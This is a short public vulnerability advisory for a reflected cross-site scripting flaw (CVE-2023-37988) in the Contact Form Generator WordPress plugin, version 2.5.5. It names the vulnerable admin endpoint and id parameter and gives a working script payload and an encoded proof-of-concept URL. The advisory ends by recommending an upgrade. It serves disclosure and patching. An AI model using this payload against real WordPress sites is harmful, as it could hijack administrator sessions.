WordPress Contact Form Generator 2.5.5 Cross Site Scripting

2023.10.03
Credit: Arvandy
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Exploit Title: WP Plugins Contact Form Generator 2.5.5 - Reflected Cross-Site Scripting # Date: 03-10-2023 # Exploit Author: Arvandy # Software Link: https://wordpress.org/plugins/contact-form-generator/ # Vendor Homepage: https://www.creative-solutions.net/ # Version: 2.5.5 # Tested on: Windows, Linux # CVE: CVE-2023-37988 # Product Description Contact Form Generator is a powerful contact form builder for WordPress! It is structured for creating Contact Forms, Application Forms, Reservation Forms, Survey Forms, Contact Data Pages and much more. You will get ready-to-use forms just after installation. Ref: https://wordpress.org/plugins/contact-form-generator/ # Vulnerability overview: The Wordpress plugins Contact Form Generator (CFG) <= 2.5.5 is vulnerable to reflected cross-site scripting via the id parameter in the Edit Fields form. This vulnerability could allow an unauthenticated malicious actor to inject malicious scripts against high privilege users. # Proof of Concept: Affected Endpoint: /wp-admin/admin.php?page=cfg_fields&act=edit&id= Affected Parameters: id XSS Payload: "><script>alert(document.cookie)</script>x http://example.com/wp-admin/admin.php?page=cfg_fields&act=edit&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ex # Recommendation Upgrade to version 2.6.0


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top